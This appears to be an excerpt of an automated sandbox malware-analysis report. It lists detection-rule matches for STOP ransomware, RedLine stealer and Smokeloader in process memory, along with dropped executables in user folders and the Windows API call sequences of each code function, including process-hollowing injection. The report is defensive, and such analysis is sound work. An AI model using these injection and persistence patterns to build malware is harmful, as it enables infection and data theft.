Source: 00000009.00000002.2028759696.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.2068159954.0000000002F43000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2265816595.0000000002F2B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1986547068.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1718596849.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.1986391859.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001C.00000002.2266063708.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000017.00000002.2181370221.0000000002F57000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.2181665321.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1719529460.0000000002FD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1986922413.0000000002F63000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1719428841.0000000002CD3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000002.2077754464.0000000002F31000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.2078107088.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1718695022.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.2049909948.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.2049909948.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: Process Memory Space: A5B6.exe PID: 7088, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 7148, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 1312, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 2496, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 5888, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 5516, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 6844, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 4592, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 7140, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A5B6.exe PID: 2472, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: D3CC.exe.1.dr Static PE information: .vmp0 and .vmp1 section names
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015D5
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401603
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040161A
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004026D2 NtOpenKey, 0_2_004026D2
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_00402745 NtEnumerateKey, 0_2_00402745
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_00402348
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040156B
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_00402770 NtEnumerateKey, 0_2_00402770
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation, 0_2_0040217B
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation, 0_2_0040217D
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021CB
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection, 0_2_004017DF
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015E0
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F1
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F5
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F8
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_00402188
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004027A0 NtClose, 0_2_004027A0
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021A1
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021BB
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_004015D5
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_00401603
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_0040161A
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004026D2 NtOpenKey, 5_2_004026D2
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_00402745 NtEnumerateKey, 5_2_00402745
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation, 5_2_00402348
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_0040156B
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_00402770 NtEnumerateKey, 5_2_00402770
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation, 5_2_0040217B
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation, 5_2_0040217D
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation, 5_2_004021CB
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004017DF NtMapViewOfSection,NtMapViewOfSection, 5_2_004017DF
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_004015E0
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_004015F1
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_004015F5
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 5_2_004015F8
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation, 5_2_00402188
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004027A0 NtClose, 5_2_004027A0
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation, 5_2_004021A1
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation, 5_2_004021BB
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 9_2_049B0110
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A70110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 14_2_04A70110
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 15_2_049B0110
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B3520 9_2_049B3520
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B7520 9_2_049B7520
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049FB69F 9_2_049FB69F
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BA699 9_2_049BA699
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BE6E0 9_2_049BE6E0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BA79A 9_2_049BA79A
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049DD7F1 9_2_049DD7F1
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BC760 9_2_049BC760
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BB0B0 9_2_049BB0B0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049C00D0 9_2_049C00D0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B30F0 9_2_049B30F0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B70E0 9_2_049B70E0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BB000 9_2_049BB000
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049CF030 9_2_049CF030
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BA026 9_2_049BA026
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049DD1A4 9_2_049DD1A4
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B9120 9_2_049B9120
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049FE141 9_2_049FE141
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_04A322C0 9_2_04A322C0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B7220 9_2_049B7220
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B7393 9_2_049B7393
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049FE37C 9_2_049FE37C
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B5DF7 9_2_049B5DF7
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B5DE7 9_2_049B5DE7
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049F2D1E 9_2_049F2D1E
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049E4E9F 9_2_049E4E9F
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B8E60 9_2_049B8E60
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B7880 9_2_049B7880
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049D18D0 9_2_049D18D0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049DF9B0 9_2_049DF9B0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049DE9A3 9_2_049DE9A3
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B89D0 9_2_049B89D0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B59F7 9_2_049B59F7
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BA916 9_2_049BA916
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B7A80 9_2_049B7A80
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BCA10 9_2_049BCA10
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049BDBE0 9_2_049BDBE0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049C0B00 9_2_049C0B00
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B2B60 9_2_049B2B60
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040D240 10_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00419F90 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00405057 10_2_00405057
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040C070 10_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0042E003 10_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0042F010 10_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00408030 10_2_00408030
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004070E0 10_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00410160 10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004C8113 10_2_004C8113
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004021C0 10_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004C9343 10_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0044237E 10_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00405447 10_2_00405447
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00405457 10_2_00405457
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004084C0 10_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004344FF 10_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00449506 10_2_00449506
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0043E5A3 10_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0044B5B1 10_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040A660 10_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00409686 10_2_00409686
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0041E690 10_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00406740 10_2_00406740
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00402750 10_2_00402750
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040A710 10_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040F730 10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00408780 10_2_00408780
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0044D7A1 10_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0042C804 10_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00406880 10_2_00406880
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00481920 10_2_00481920
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0044D9DC 10_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004069F3 10_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00449A71 10_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00443B40 10_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00402B80 10_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00406B80 10_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00409CF9 10_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0044ACFF 10_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040DD40 10_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00427D6C 10_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040BDC0 10_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00409DFA 10_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0042CE51 10_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00406EE0 10_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00409F76 10_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00420F30 10_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00449FE3 10_2_00449FE3
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A73520 14_2_04A73520
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A77520 14_2_04A77520
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04ABB69F 14_2_04ABB69F
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7A699 14_2_04A7A699
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7E6E0 14_2_04A7E6E0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7A79A 14_2_04A7A79A
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A9D7F1 14_2_04A9D7F1
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7C760 14_2_04A7C760
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7B0B0 14_2_04A7B0B0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A770E0 14_2_04A770E0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A730F0 14_2_04A730F0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A800D0 14_2_04A800D0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7A026 14_2_04A7A026
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A8F030 14_2_04A8F030
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7B000 14_2_04A7B000
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A9D1A4 14_2_04A9D1A4
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A79120 14_2_04A79120
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04ABE141 14_2_04ABE141
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04AF22C0 14_2_04AF22C0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A77220 14_2_04A77220
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A77393 14_2_04A77393
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04ABE37C 14_2_04ABE37C
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A75DE7 14_2_04A75DE7
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A75DF7 14_2_04A75DF7
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04AB2D1E 14_2_04AB2D1E
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04AA4E9F 14_2_04AA4E9F
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A78E60 14_2_04A78E60
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A77880 14_2_04A77880
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A918D0 14_2_04A918D0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A9E9A3 14_2_04A9E9A3
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A9F9B0 14_2_04A9F9B0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A759F7 14_2_04A759F7
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A789D0 14_2_04A789D0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7A916 14_2_04A7A916
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A77A80 14_2_04A77A80
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7CA10 14_2_04A7CA10
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A7DBE0 14_2_04A7DBE0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A80B00 14_2_04A80B00
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A72B60 14_2_04A72B60
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B3520 15_2_049B3520
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B7520 15_2_049B7520
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049FB69F 15_2_049FB69F
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BA699 15_2_049BA699
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BE6E0 15_2_049BE6E0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BA79A 15_2_049BA79A
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049DD7F1 15_2_049DD7F1
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BC760 15_2_049BC760
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049BB0B0 15_2_049BB0B0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049C00D0 15_2_049C00D0
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B30F0 15_2_049B30F0
